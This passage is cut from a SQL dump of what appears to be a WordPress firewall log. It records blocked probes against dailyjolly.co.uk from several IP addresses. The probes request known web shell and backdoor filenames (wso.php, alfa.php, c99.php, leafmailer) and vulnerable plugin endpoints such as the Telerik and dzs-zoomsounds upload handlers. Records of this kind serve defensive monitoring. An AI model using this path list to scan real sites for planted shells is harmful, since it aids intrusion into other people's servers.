Safari\\/537.36\"}','xLRIe2hlJmiwHPCzSdnQo3ty',0,1674121735.6231,218,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/.tmb/cache/shz.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','eBu6HYxMXiSnRVFKa5NAopOz',0,1674121738.5017,280,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/shell20220621.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','1PM9QikCwFqVLZ6XIp5Osvb8',0,1674121738.9400,212,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/gank.php.PhP','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','IfywJTBgQAE65DFxuSUhbMo1',0,1674121740.8617,228,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/lufix.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','rLZjCUzTeYIKwlM12SsWv5hx',0,1674121741.1733,284,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-admin/maint/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','TZc0V7C4QSKFe9nkMmb1yaOs',0,1674121741.3287,263,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','zL0rRuDCYn5XwSjscg1ofaUH',0,1674121741.5511,369,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/license.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','qx1oe6fLmJXrAGT5uwsFQSEV',0,1674121742.0533,612,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','5S3GU1sd06QrhqKcy7azkwlg',0,1674121742.2552,666,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/media-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','1ILuEPUKi8cojv3Ds2NwrQOx',0,1674121742.6116,852,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-includes/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','o6BR3YKQmceDIysHd4tiZ8hA',0,1674121743.0731,1033,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','mqb6HRa5BNFcUyJwKZlrpMe0',0,1674121743.1427,1114,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/.tmb/cache/shz.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','T6ieXhZgr8uFa1zAJ05NHdc9',0,1674121743.6096,1214,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-content/about.php','','{\"1\":\"python-requests\\/2.28.2\"}','Hc4LJwBZbQlgX6Y1NmnuCiqF',0,1674121750.8913,254,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wordpress/wp-content/themes/seotheme/mar.php','','{\"1\":\"python-requests\\/2.28.2\"}','H6Xs1YNLOn29FQDAPi0vIUWJ',0,1674121750.9315,238,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/f.php','','{\"1\":\"python-requests\\/2.28.2\"}','P7UxyC4YEXKojgAiBOGM8kZv',0,1674121751.0885,231,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-includes/images/wp-blog.php','','{\"1\":\"python-requests\\/2.28.2\"}','gXMF9pNVf0scITznhQByHA3K',0,1674121751.0845,286,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','1Uu5gX4JB2IEAQGWlNxfaDqs',0,1674121753.5162,224,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-includes/images/wp-blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','wYOmWevt1RPhyc45UdLGxbBg',0,1674121754.1421,312,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wordpress/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','YFzoDHObZGEtWcqPJKsemNRV',0,1674121754.7659,407,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-content/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','vNVC1OH7xgSLhqEI26np9ij0',0,1674121757.3913,228,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/fw.php','','{\"1\":\"python-requests\\/2.28.2\"}','yQk9YK8NqLUzGZCmTEFhpnP5',0,1674121765.0453,846,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/o.php','','{\"1\":\"python-requests\\/2.28.2\"}','kvxN4VnocKsbW1PJyYhGw6d2',0,1674121764.9768,980,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','59fU1iBN46eP8L2mnwYTgjaR',0,1674121769.6806,367,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','b2HqCnusW3jOkXhMmTAF9JQy',0,1674121769.6794,581,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u','','{\"1\":\"python-requests\\/2.28.1\"}','w2rnDo6VRGAiOXQ1LqNYH5d4',0,1674121802.5533,213,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-content/theme/seotheme/db.php?u','','{\"1\":\"python-requests\\/2.28.1\"}','6Igo2m9lrSn7xdAbHOLZYkWB',0,1674121805.6486,196,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"python-requests\\/2.28.1\"}','fqhdAkQaRx9EL6KZ40TVFUr8',0,1674121814.5395,226,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','','{\"1\":\"python-requests\\/2.28.1\"}','e1IbAFaJG5YjxXkM8oTE6zQm',0,1674121831.2141,310,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"python-requests\\/2.28.1\"}','rg2FyUaIRTQZu1pkhz0W7YNs',0,1674121847.1948,220,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/db.php?u','','{\"1\":\"python-requests\\/2.28.1\"}','fdjz4X1HLVgMWIG8pYTabJl9',0,1674121916.3500,267,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-includes/wp-class.php','','{\"1\":\"python-requests\\/2.28.1\"}','LnUF73EzT8xpeDVyAs2aqKYS',0,1674121948.4628,236,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-includes/fonts/css.php','','{\"1\":\"python-requests\\/2.28.1\"}','HD0EQ6wAulRSWbd9qUnYXZza',0,1674121956.6740,205,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/0z.php','','{\"1\":\"python-requests\\/2.28.1\"}','QLDcR96sHmTgnybuwJAOjt5a',0,1674121973.3883,191,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-content/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko\\/20100101 Firefox\\/103.0\"}','qkbVmcgY3M8hBAH7z102GJQN',0,1674121977.3299,239,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-content/utchiha-HJHB.php','','{\"1\":\"python-requests\\/2.28.1\"}','k4hsDtGRuFHWY3752TrQgCKB',0,1674121979.0294,229,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"python-requests\\/2.28.1\"}','JMAxh0aEvFdRBiO6eC3nIcrN',0,1674121984.2614,194,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/lufix.php','','{\"1\":\"python-requests\\/2.28.1\"}','xA5w3TgbPqWBRhDnCKIjk6HZ',0,1674121991.4267,232,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/upl.php','','{\"1\":\"python-requests\\/2.28.1\"}','OIVU7CP3w40a18LRbQ6BrDSy',0,1674121996.6652,227,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/upl.php','','{\"1\":\"python-requests\\/2.28.1\"}','1JdDlTMaBm6EfqsYgpxOj4nL',0,1674121999.1012,178,'','POST',403,0,700,0,1,'',0),('72.52.161.87',1211408727,'','https://www.dailyjolly.co.uk/Telerik.Web.UI.WebResource.axd?type=rau','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.75.14 (KHTML, like Gecko) Version\\/7.0.3 Safari\\/7046A194A\"}','uEi0kspFA7tD8zfT4jSaqgWN',0,1674144960.1811,223,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/https:/www.dailyjolly.co.uk/xmlrpc.php?rsd','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/.well-known\\/https:\\/\\/www.dailyjolly.co.uk\\/xmlrpc.php?rsd\"}','Hd2zWPvXV9GtqZuSam8n3Ys7',0,1674151223.2271,188,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/admin/controller/extension/extension/https:/www.dailyjolly.co.uk/xmlrpc.php?rsd','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/admin\\/controller\\/extension\\/extension\\/https:\\/\\/www.dailyjolly.co.uk\\/xmlrpc.php?rsd\"}','39LvaVRhYlyZoED82JCIuNGf',0,1674151224.0901,210,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/admin/tmp/https:/www.dailyjolly.co.uk/xmlrpc.php?rsd','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/admin\\/tmp\\/https:\\/\\/www.dailyjolly.co.uk\\/xmlrpc.php?rsd\"}','xpJzhTnB75SRZc3dWej2k9C8',0,1674151224.8998,163,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/admin/upload/https:/www.dailyjolly.co.uk/xmlrpc.php?rsd','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/admin\\/upload\\/https:\\/\\/www.dailyjolly.co.uk\\/xmlrpc.php?rsd\"}','UEGg1X0TVKnCkyBbJxfm5YWL',0,1674151225.6598,158,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/administrator/https:/www.dailyjolly.co.uk/xmlrpc.php?rsd','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/administrator\\/https:\\/\\/www.dailyjolly.co.uk\\/xmlrpc.php?rsd\"}','sHtLdxFAB4Q0MPbKDmaN8OvJ',0,1674151226.4118,173,'','GET',403,0,700,0,1,'',0),('185.192.70.206',3116385998,'','https://dailyjolly.co.uk/wp-admin/imagescheckflush.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','cG7ShXy2WlZ0qxtprACo6Kkm',0,1674181814.9350,256,'','POST',403,0,700,0,1,'',0),('40.117.83.110',678777710,'','https://www.dailyjolly.co.uk/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','hCf7RQ2ijOuYP3EwrpLnHc9y',0,1674201202.2572,3392,'','POST',403,0,700,0,1,'',0),('40.117.83.110',678777710,'','https://www.dailyjolly.co.uk/zylgaagq.php?Fox=d3wL7','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','xnT72YuiQXdoHl0OpsGPF5hB',0,1674201206.4413,872,'','GET',403,0,700,0,1,'',0),('40.117.83.110',678777710,'','https://www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kprRHPyw6jixS9ohUuvCEmJs',0,1674201213.5434,209,'','GET',403,0,700,0,1,'',0),('123.30.210.207',2065617615,'','https://dailyjolly.co.uk/wp-admin/style.php?sig=rename','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.107 Safari\\/537.36\"}','kfs2VpZQ7GCAxDIMbwTB5JiX',0,1674225273.5440,244,'','GET',403,0,700,0,1,'',0),('123.30.210.207',2065617615,'','https://dailyjolly.co.uk/style.php?sig=rename','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.1.1; Nokia 2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/71.0.3578.83 Mobile Safari\\/537.36\"}','gjlnMKWhpemyw7XirSYU1GFb',0,1674225273.5388,301,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','60x1lzYvDweXCfZksIhgtVRQ',0,1674228736.0869,233,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','S0N2xKd4VZEAQLYbJMaOoCcR',0,1674228857.0718,215,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','S3gxQMhtDzp5yUeFJHdCnLfY',0,1674228942.3911,190,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','9b1YjuExMHL3Pw8WvmAGe0rc',0,1674229013.2272,219,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','CJEwYdHStmuUjyOzqRgFpAe2',0,1674229125.6214,557,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','eagAxGTjHFIchpbJOwPu6E98',0,1674229164.1591,189,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/home.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Hw5NgixbJtqY82WK6ljBUpkS',0,1674229277.5457,530,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','mZAugJMntl3hWFvHIXVcobRP',0,1674229316.8373,202,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PuXEmal3LizK0VRoxkItjpFC',0,1674229465.0508,185,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','bYq3c0zgKeT5QBAt7LIwjMaU',0,1674229542.7685,207,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dkNYCp7RUK1xHs9zcrSDJ8AL',0,1674229764.7717,236,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','M0Xez41q2WjxigbtmaVpFd8o',0,1674229800.9840,194,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','JoLQ2V81Z6PO3deizBnUSYym',0,1674229837.0396,206,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','4g1vNUatyD6QMBksz7hq8RnF',0,1674229946.5840,192,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','hvPWKf3RO9cAGCat5yEml6Q1',0,1674230016.3782,462,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/uploader.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BLI6FqPlwc2ZCdxfKN0e4tjO',0,1674230052.8269,218,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','l4nauQhEpDTVmKvR5bteIHLf',0,1674230273.4876,253,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/anone.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OX8zE1WMu7DtLaHfGr60eyBK',0,1674230349.9961,1090,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','u1n4P2ae7lDVSQkvqyEb6fcz',0,1674230436.2081,195,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YVjT5nKpMymE6HB07tf9UleC',0,1674230690.5448,210,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rIHLQojkFMYZJG7ayX9qdP2u',0,1674230690.9265,176,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Gl6aiJKszmnxTU4XBeRL8hSc',0,1674230728.6060,195,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PtXF6EcQudjy2UKk07iTDobV',0,1674230763.6082,231,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8GgvLnh4e1aNEMSKbioW5VIu',0,1674230800.7958,277,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','re2fCJcdZ8yKntzjLpAbUxvu',0,1674230874.4402,223,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kzRUAopiE9qdOfeFcLVghtNb',0,1674230909.9956,185,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','tIsBUP7VnvgDu9XZmcq5S6Qj',0,1674230945.9514,255,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dELlWYGmzRSNFKn1k4eArMsB',0,1674230984.9609,180,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/wp-confirm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ZCdoLR7VJ3yb2sitv9u4QSP8',0,1674230985.3643,172,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/images/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','AH7YPZCIscLdjGftuJOQxEaz',0,1674231020.2549,212,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/dr.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dwi7pF19RtQyDhEBsZbjArov',0,1674231058.8597,188,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OYsU1SnE4QzFL5NxTWR6AtqK',0,1674231096.2404,209,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','r6357thTbAPnwep2x9JNvSdm',0,1674231129.7214,210,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/wp-blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 